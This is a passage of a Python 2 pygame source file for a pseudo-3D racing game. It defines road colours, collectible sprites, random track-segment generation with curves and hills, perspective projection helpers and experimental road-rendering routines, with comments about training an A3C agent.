'PLAYER_RIGHT': { 'x': 995, 'y': 531, 'w': 80, 'h': 41 }
}
FP_COLOR_WHITE = '#FFFFFF'
FP_COLOR_BLACK = '#000000'
FP_COLOR_YELLOW = '#EEEE00'
FP_COLOR_BLUE = '#00EEEE'
FP_COLORS = {
'SKY': '#72D7EE',
'TREE': '#005108',
'FOG': '#005108',
'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},
'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' },
'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE},
'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK},
'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},
}
FP_ROAD = {
'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 }, # num segments
'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 },
'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 },
}
FP_ROAD_SPRTS = {
'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,},
'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},
'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,},
'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,},
'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,},
'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,},
'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,},
'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,},
'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,},
'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},
'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,},
#'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,},
#'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,},
#'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,},
'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,},
'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,},
'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},
}
class SptTmpx(sptdraw.SptDrawBase):
def __init__(self, size, *args, **kwargs):
super(SptTmpx, self).__init__(size)
self.draw_on()
def draw_on(self, *args, **kwargs):
self.fill(consts.GREEN)
self.pygm.draw.circle(self.surf, consts.WHITE,
(self.size[0] / 2, self.size[1] / 2),
self.size[0] / 2, 0)
class SptTmpi(pygm.SptImg):
def __init__(self, img_file, *args, **kwargs):
super(SptTmpi, self).__init__(img_file)
class FPSptBg(pygm.SptImgOne):
def __init__(self, img_file, pos, *args, **kwargs):
super(FPSptBg, self).__init__(img_file, pos)
class FPSptSprts(pygm.SptImgOne):
def __init__(self, img_file, pos, *args, **kwargs):
super(FPSptSprts, self).__init__(img_file, pos)
class FPSptFog(sptdraw.SptDrawBase):
def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
super(FPSptFog, self).__init__(size)
self.c = c
self.h = h
self.draw_on()
def draw_on(self, *args, **kwargs):
#self.fill(self.c)
d = 2
n = self.h / d
for i in range(n):
rct = [0, i * d, self.size[0], d]
#ca = 255 / n * (n - i)
ca = 200 / n * (n - i)
self.c[3] = ca
self.pygm.draw.rect(self.surf, self.c, rct)
class FPSptRdSprts(pygm.SptImg):
def __init__(self, img_file, *args, **kwargs):
super(FPSptRdSprts, self).__init__(img_file)
@classmethod
def create_by_img(cls, img):
return cls(img)
# for test
#o = SptTmpx((40, 40))
#return o
class FPSptRoadB(sptdraw.SptDrawBase):
def __init__(self, size, cfg, *args, **kwargs):
super(FPSptRoadB, self).__init__(size)
self.cfg = cfg
self.car = kwargs.get('car')
self.bg_sky = kwargs.get('bg_sky')
self.bg_hills = kwargs.get('bg_hills')
self.bg_trees = kwargs.get('bg_trees')
self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])
self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
self.rd_reset(init=True)
self.add_fog()
def prms_reset(self, keep_segs=False):
self.e_keys_up = []
self.e_keys_dn = []
self.camera_x = 0.0
self.camera_y = 0.0
self.camera_z = 500.0#1000.0#0.0 == self.camera_h
self.xw = 0.0
self.yw = 0.0
self.zw = 0.0
self.xc = 0.0
self.yc = 0.0
self.zc = 0.0 ##
self.xp = 0.0
self.yp = 0.0
self.xs = 0.0
self.ys = 0.0
self.d = 200.0#100.0#10.0#30.0#1.0
self.w = self.size[0]
self.h = self.size[1]
if not keep_segs:
self.segments = []
self.rd_sprt_objs = {}
self.rd_sprt_cache = [] # for sprites render order
self.track_len = 0.0
self.seg_len = 200.0#100.0#20.0#60.0#200.0#
self.road_w = 2400#2000#600.0#200.0#1000.0#200#
self.camera_h = 500.0#1000.0#
self.speed_max = 300.0#180.0#200.0#100.0
self.lane_w = 60
self.seg_n = 300#200
#self.seg_draw_n = 200#150
self.seg_draw_n = 70#100#200#150
self.speed = 0.0
self.position = 0.0
self.player_x = 0.0#100.0#1000.0#
self.centrifugal = 0.1#0.06#0.08#0.01#0.3
self.player_seg = None
self.base_seg = None # the segment just under the car
self.player_di = 0 # 0:^ 1:> 2:v 3:<
self.player_go = 0 # 0:- 1:^ 2:v
self.speed_dt_up = 1.0#2.0#3.0
self.speed_dt_dn = 2.0#4.0#6.0
self.speed_dt_na = 1.0#3.0
self.player_x_dt = 60.0#30.0#20.0
self.last_seg_i = 0
self.score = 0
self.game_over = False
self.game_score = 0.0
self.tm_start = 0.0
self.tm_end = 0.0
self.tm_last_once = 0.0
self.sky_speed = 0.1#0.05#
self.hill_speed = 0.2#0.1#
self.tree_speed = 0.3#0.15#
def rd_reset(self, init=False, keep_segs=False, segs_file=None):
#if not init and not keep_segs:
if not init:
self.rd_sprts_del_all_objs()
self.prms_reset(keep_segs=keep_segs)
if segs_file is not None:
try:
segs = self.rd_seg_json_load(segs_file)
self.segments = segs
self.track_len = len(self.segments) * self.seg_len
except Exception as e:
print e
self.init_rd_segs_rand_1()
else:
if not keep_segs:
self.init_rd_segs_rand_1()
self.draw_on()
self.rd_seg_render()
def init_rd_segs_rand_1(self):
#self.rd_seg_init(self.seg_n)
#self.rd_seg_init(self.seg_draw_n)
#self.rd_seg_init(100)#20#500#2#10#4#1#100#200
#self.rd_seg_init(random.randint(30, 100))
self.rd_seg_init(random.randint(1, 10)) # for a3c train
self.rd_seg_init_rand_curve()
#self.add_curves()
#self.add_low_rolling_hills(20, 2.0)
##self.add_low_rolling_hills(30, 4.0)
#self.rd_seg_init_rand(10)#50#10#3#1
#segnrand = random.randint(3, 30)
segnrand = random.randint(2, 6) # for a3c train
self.rd_seg_init_rand(segnrand)
# for segment draw
#self.rd_seg_init(self.seg_draw_n)
#self.rd_seg_init(100)#20#500#2#10#4#1#100#200
self.rd_seg_init(10) # for a3c train
self.rd_start_seg_init()
self.rd_sprts_init_rand()
def draw_on(self, *args, **kwargs):
self.fill(self.clr_dark_grass)
def add_fog(self):
self.fog = FPSptFog(self.size)
self.fog.rect.top = 240
self.fog.rect.left = 0
self.disp_add(self.fog)
def get_seg_base_i(self, pos=None):
if pos is None:
pos = self.position
i = int(pos / self.seg_len)
#x#i = int(utils.math_round(pos / self.seg_len))
#i = int(math.floor(pos / self.seg_len))
#i = int(math.ceil(pos / self.seg_len))
seg_n = len(self.segments)
i = (i + seg_n) % seg_n
return i
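    # For example (illustrative numbers): with seg_len = 200.0 and
    # position = 1234.0, int(1234.0 / 200.0) gives 6, which is then wrapped
    # into [0, len(self.segments)) so the index stays valid after looping.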
def rd_get_segs(self, whole=False):
if whole:
segs = self.segments
else:
segs = self.segments[:-self.seg_draw_n]
return segs
# #### geometry #### #
def geo_prjc_scale(self, d, zc):
if zc == 0.0:
return 1.0
else:
return d / zc
def xc_to_xp(self, xc, d, zc):
if zc == 0.0:
#xp = float('inf')
#xp = 2 ** 64
xp = xc
else:
xp = xc * (d / zc)
return xp
def yc_to_yp(self, yc, d, zc):
if zc == 0.0:
#yp = float('inf')
#yp = 2 ** 64
yp = yc
else:
yp = yc * (d / zc)
return yp
def xp_to_xs(self, xp, w):
#xs = w / 2.0 + w / 2.0 * xp
xs = w / 2.0 + xp
return xs
def yp_to_ys(self, yp, h):
#ys = h / 2.0 - h / 2.0 * yp
ys = h / 2.0 - yp
return ys
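    # Worked example of the projection chain (illustrative numbers only):
    # with d = 200.0, w = 640, h = 240 and camera height yc = 500.0, a road
    # edge at xc = 1200.0 (half of road_w) at depth zc = 2000.0 projects to
    #   xp = 1200 * (200 / 2000) = 120  ->  xs = 640/2 + 120 = 440
    #   yp =  500 * (200 / 2000) =  50  ->  ys = 240/2 -  50 =  70
    # so distant segments shrink toward the screen center as zc grows.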
def rd_seg_init(self, a=500):
for n in range(a):
self.rd_seg_add(0.0, 0.0)
def rd_seg_add(self, curve=0.0, yw=0.0):
#print '+', curve, yw
n = len(self.segments)
#print n
if n % 2 == 0:
#if n % 4 == 0:
c = FP_COLORS['LIGHT']
#c = {'road': FP_COLOR_WHITE}
else:
c = FP_COLORS['DARK']
#c = {'road': FP_COLOR_BLACK}
seg = {
'index': n,
'p1': {'world': {'z': (n + 1) * self.seg_len,
'y': self.seg_lasy_y()},
'camera': {},
'screen': {}},
'p2': {'world': {'z': (n + 2) * self.seg_len,
'y': yw},
'camera': {},
'screen': {}},
'curve': curve,
'color': c,
'sprites': [],
'looped': 0,
}
self.segments.append(seg)
self.track_len = len(self.segments) * self.seg_len
#self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len
def seg_lasy_y(self):
seg_n = len(self.segments)
if seg_n == 0:
return 0.0
else:
return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)
def rd_seg_init_rand(self, n=50):
#print 'rd_seg_init_rand', n
for i in range(n):
p = random.random()
#print p
rl = random.choice([1, -1])
enter = random.randint(10, 40)
hold = random.randint(10, 40)
leave = random.randint(10, 40)
if p < 0.3:
curve = 0.0
yw = 0.0
#elif p < 0.8:
# curve = 0.0
# yw = random.random() * 10.0
else:
curve = rl * random.random() * 6.0
yw = 0.0
self.add_road(enter, hold, leave, curve, yw)
def rd_seg_init_rand_2(self, n=50):
for i in range(n):
p = random.random()
#print p
rl = random.choice([1, -1])
if p < 0.35:
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
rl * FP_ROAD['CURVE']['MEDIUM'])
elif p < 0.7:
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
rl * FP_ROAD['CURVE']['EASY'])
else:
enter = random.randint(10, 100)
hold = random.randint(10, 100)
leave = random.randint(10, 100)
self.add_road(enter, hold, leave, 0.0, 0.0)
def rd_seg_init_rand_curve(self, n=5):
#print 'rd_seg_init_rand', n
for i in range(n):
rl = random.choice([1, -1])
enter = random.randint(10, 40)
hold = random.randint(10, 40)
leave = random.randint(10, 40)
curve = rl * random.random() * 8.0
yw = 0.0
self.add_road(enter, hold, leave, curve, yw)
def rd_start_seg_init(self, n=3):
seg_n = len(self.segments)
if seg_n == 0:
return
#self.segments[0]['color'] = FP_COLORS['START_Y']
#self.segments[2]['color'] = FP_COLORS['START_Y']
for i in range(n):
self.segments[i]['color'] = FP_COLORS['START_Y']
def rd_sprts_init_rand(self, n=None):
seg_n = len(self.segments)
if n is None:
#n = seg_n / 20
n = seg_n / random.randint(10, 30)
for i in range(n):
j = random.randint(10, seg_n - 10)
sprt = random.choice(FP_ROAD_SPRTS.keys())
s = {
'name': sprt,
'type': 1, # image / animate / ...
'obj': None, # need to create at render
##'x_i': None, # get real (random) x from x_pos
'x_i': random.randint(0, 4),
'score': FP_ROAD_SPRTS[sprt].get('score', 0),
}
self.segments[j]['sprites'].append(s)
def rd_sprts_del_all_objs(self):
for k, sprt in self.rd_sprt_objs.items():
#print k, sprt
self.disp_del(sprt)
del self.rd_sprt_objs[k]
def util_limit(self, value, mn, mx):
return max(mn, min(value, mx))
def util_accelerate(self, v, accel, dt):
return v + (accel * dt)
def util_increase(self, start, increment, mx): # with looping
result = start + increment
while (result >= mx):
result -= mx
while (result < 0):
result += mx
return result
def util_ease_in(self, a, b, percent):
return a + (b - a) * math.pow(percent, 2)
def util_ease_out(self, a, b, percent):
return a + (b - a) * (1 - math.pow(1 - percent, 2))
def util_ease_in_out(self, a, b, percent):
return a + (b - a) * ((-math.cos(percent * math.pi)/2) + 0.5)
def util_curve_percent_remaining(self, n, total):
return (n % total) / total
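    # Quick sanity check of the easing helpers (illustrative values):
    #   util_ease_in(0, 6, 0.5)      -> 0 + 6 * 0.25 = 1.5
    #   util_ease_out(0, 6, 0.5)     -> 0 + 6 * (1 - 0.25) = 4.5
    #   util_ease_in_out(0, 6, 0.5)  -> 0 + 6 * 0.5 = 3.0
    #   util_curve_percent_remaining(150.0, 200.0) -> 0.75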
def add_road(self, enter, hold, leave, curve, yw=0.0):
#print enter, hold, leave, curve, yw
start_y = self.seg_lasy_y()
end_y = start_y + (int(yw) * self.seg_len)
total = enter + hold + leave
for n in range(enter):
self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),
self.util_ease_out(start_y, end_y,
float(n)/total))
for n in range(hold):
self.rd_seg_add(curve,
self.util_ease_out(start_y, end_y,
(float(n)+enter)/total))
for n in range(leave):
            self.rd_seg_add(self.util_ease_out(curve, 0, float(n)/leave),
self.util_ease_out(start_y, end_y,
(float(n)+enter+hold)/total))
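    # For example, add_road(25, 50, 25, 4.0) appends 100 segments whose curve
    # eases in from 0 to 4 over the first 25 segments, holds at 4 for the next
    # 50, and eases back out to 0 over the last 25; the optional yw argument
    # raises or lowers the segments the same way to build hills.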
def add_curves(self):
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
-FP_ROAD['CURVE']['EASY'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['CURVE']['MEDIUM'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['CURVE']['EASY'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
-FP_ROAD['CURVE']['EASY'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
-FP_ROAD['CURVE']['MEDIUM'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
0.0)
def add_low_rolling_hills(self, num, height):
        num = num or FP_ROAD['LENGTH']['SHORT']
        height = height or FP_ROAD['HILL']['LOW']
self.add_road(num, num, num, 0, height/2.0)
self.add_road(num, num, num, 0, -height)
self.add_road(num, num, num, 0, height)
self.add_road(num, num, num, 0, 0)
self.add_road(num, num, num, 0, height/2.0)
self.add_road(num, num, num, 0, 0)
def rd_seg_get_cleared(self, segs=None):
if not segs:
segs = self.segments
segs_c = []
for seg in segs:
if not seg['sprites']:
segs_c.append(seg)
else:
seg_c = {}
for k, v in seg.items():
if k not in ['sprites']:
seg_c[k] = v
else:
seg_c[k] = []
for spr in seg['sprites']:
spr_n = {}
for sk, sv in spr.items():
if sk not in ['obj']:
spr_n[sk] = sv
else:
spr_n[sk] = None
seg_c[k].append(spr_n)
segs_c.append(seg_c)
return segs_c
def rd_seg_json_save(self, f):
sc = self.rd_seg_get_cleared(self.segments)
s = utils.json_dumps(sc)
with open(f, 'w') as fo:
fo.write(s)
def rd_seg_json_load(self, f):
with open(f, 'r') as fi:
s = fi.read()
segs = utils.json_loads(s)
return segs
def rd_seg_render__1_o(self):
"""straight"""
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
xcl1 = xc1 - self.lane_w
xcl2 = xc2 + self.lane_w
xcl3 = xc3 - self.lane_w
xcl4 = xc4 + self.lane_w
xcr1 = self.lane_w - self.player_x
xcr2 = -self.lane_w - self.player_x
xcr3 = self.lane_w - self.player_x
xcr4 = -self.lane_w - self.player_x
yc = self.camera_h
#print '=' * 80
#print 'self.position', self.position
for i, seg in enumerate(self.segments):
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
#zc1 = self.position - (zw1 - self.camera_z)
#zc2 = self.position - (zw2 - self.camera_z)
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
if 1:#i % 2 == 1:
xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
xsl1 = self.xp_to_xs(xpl1, self.w)
xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
xsl2 = self.xp_to_xs(xpl2, self.w)
xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
xsl3 = self.xp_to_xs(xpl3, self.w)
xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
xsl4 = self.xp_to_xs(xpl4, self.w)
self.render_polygon(None,
xs1, ys1, xsl1, ys1,
xsl3, ys3, xs3, ys3,
seg['color']['rumble'])
self.render_polygon(None,
xs2, ys2, xsl2, ys2,
xsl4, ys4, xs4, ys4,
seg['color']['rumble'])
xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
xsr1 = self.xp_to_xs(xpr1, self.w)
xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
xsr2 = self.xp_to_xs(xpr2, self.w)
xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
xsr3 = self.xp_to_xs(xpr3, self.w)
xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
xsr4 = self.xp_to_xs(xpr4, self.w)
self.render_polygon(None,
xsr1, ys1, xsr2, ys2,
xsr4, ys4, xsr3, ys3,
seg['color']['rumble'])
def rd_seg_render__2_o(self):
"""curve test 1"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
yc = self.camera_h
print '=' * 80
print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
print 'segbi', segbi
# TODO: do at update
#dpx1 = self.seg_len * math.tan(theta_i)
#self.player_x -= dpx1
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#x#zw1 = (i+1)*self.seg_len
#zw2 = (i+2)*self.seg_len
#'''
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
curve_d = 500
#x#xc1 = self.road_w / 2 - self.player_x - curve_d * i
#xc2 = -self.road_w / 2 - self.player_x - curve_d * i
#xc3 = self.road_w / 2 - self.player_x - curve_d * i
#xc4 = -self.road_w / 2 - self.player_x - curve_d * i
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
#'''
#if 1:
#if i < self.seg_draw_n / 2:
if i < self.seg_draw_n / 4:
theta1 = theta_i * i
theta2 = theta_i * (i + 1)
dx1 = self.seg_len * math.tan(theta1)
dx2 = self.seg_len * math.tan(theta2)
xs1 += dx1
xs2 += dx1
xs3 += dx2 #+ dx1
xs4 += dx2 #+ dx1
#'''
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
def rd_seg_render__3_o(self):
"""curve test 2: draw a circle"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
#xc1 = self.road_w / 2 - self.player_x
#xc2 = -self.road_w / 2 - self.player_x
#xc3 = self.road_w / 2 - self.player_x
#xc4 = -self.road_w / 2 - self.player_x
# <3>
#engi = math.pi / 2.0 / self.seg_draw_n
engi = math.pi / 2.0 / 60#10#20
rad = self.road_w * 4#2
rad1 = rad + self.road_w / 2
rad2 = rad - self.road_w / 2
yc = self.camera_h
print '=' * 80
print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
print 'segbi', segbi
# TODO: do at update
#dpx1 = self.seg_len * math.tan(theta_i)
#self.player_x -= dpx1
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#x#zw1 = (i+1)*self.seg_len
#zw2 = (i+2)*self.seg_len
#'''
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
curve_d = 500
#x#xc1 = self.road_w / 2 - self.player_x - curve_d * i
#xc2 = -self.road_w / 2 - self.player_x - curve_d * i
#xc3 = self.road_w / 2 - self.player_x - curve_d * i
#xc4 = -self.road_w / 2 - self.player_x - curve_d * i
# <3>
xx1 = rad1 * math.cos(engi * i)
xx2 = rad2 * math.cos(engi * i)
xx3 = rad1 * math.cos(engi * (i + 1))
xx4 = rad2 * math.cos(engi * (i + 1))
xc1 = (rad - xx1) - self.player_x
xc2 = (rad - xx2) - self.player_x
xc3 = (rad - xx3) - self.player_x
xc4 = (rad - xx4) - self.player_x
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
'''
#if 1:
#if i < self.seg_draw_n / 2:
if i < self.seg_draw_n / 4:
theta1 = theta_i * i
theta2 = theta_i * (i + 1)
dx1 = self.seg_len * math.tan(theta1)
dx2 = self.seg_len * math.tan(theta2)
xs1 += dx1
xs2 += dx1
xs3 += dx2 #+ dx1
xs4 += dx2 #+ dx1
'''
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
def rd_seg_render__4_o(self):
"""curve"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
#xcl1 = xc1 - self.lane_w
#xcl2 = xc2 + self.lane_w
#xcl3 = xc3 - self.lane_w
#xcl4 = xc4 + self.lane_w
xcr1 = self.lane_w - self.player_x
xcr2 = -self.lane_w - self.player_x
xcr3 = self.lane_w - self.player_x
xcr4 = -self.lane_w - self.player_x
yc = self.camera_h
print '=' * 80
print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
print 'segbi', segbi
self.player_seg = self.segments[segbi]
b_curve = self.player_seg.get('curve', 0.0)
#b_percent = 0.5
b_percent = self.util_curve_percent_remaining(self.position,
self.seg_len)
dx_curve = - (b_curve * b_percent)
x_curve = 0
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#'''
'''
#x#
if seg['index'] < segbi:
zw1 = (i+1)*self.seg_len
zw2 = (i+2)*self.seg_len
else:
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
'''
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
# for curve
xc1 = xc1 - x_curve
xc2 = xc2 - x_curve
xc3 = xc3 - x_curve - dx_curve
xc4 = xc4 - x_curve - dx_curve
xcl1 = xc1 - self.lane_w
xcl2 = xc2 + self.lane_w
xcl3 = xc3 - self.lane_w
xcl4 = xc4 + self.lane_w
xcr1 = xcr1 - x_curve
xcr2 = xcr2 - x_curve
xcr3 = xcr3 - x_curve - dx_curve
xcr4 = xcr4 - x_curve - dx_curve
x_curve = x_curve + dx_curve
dx_curve = dx_curve + seg.get('curve', 0.0)
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
'''
#if 1:
#if i < self.seg_draw_n / 2:
if i < self.seg_draw_n / 4:
theta1 = theta_i * i
theta2 = theta_i * (i + 1)
dx1 = self.seg_len * math.tan(theta1)
dx2 = self.seg_len * math.tan(theta2)
xs1 += dx1
xs2 += dx1
xs3 += dx2 #+ dx1
xs4 += dx2 #+ dx1
'''
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
if 1:#i % 2 == 1:
xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
xsl1 = self.xp_to_xs(xpl1, self.w)
xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
xsl2 = self.xp_to_xs(xpl2, self.w)
xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
xsl3 = self.xp_to_xs(xpl3, self.w)
xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
xsl4 = self.xp_to_xs(xpl4, self.w)
self.render_polygon(None,
xs1, ys1, xsl1, ys1,
xsl3, ys3, xs3, ys3,
seg['color']['rumble'])
self.render_polygon(None,
xs2, ys2, xsl2, ys2,
xsl4, ys4, xs4, ys4,
seg['color']['rumble'])
xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
xsr1 = self.xp_to_xs(xpr1, self.w)
xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
xsr2 = self.xp_to_xs(xpr2, self.w)
xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
xsr3 = self.xp_to_xs(xpr3, self.w)
xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
xsr4 = self.xp_to_xs(xpr4, self.w)
self.render_polygon(None,
xsr1, ys1, xsr2, ys2,
xsr4, ys4, xsr3, ys3,
seg['color']['rumble'])
def rd_seg_render(self):
"""curve"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
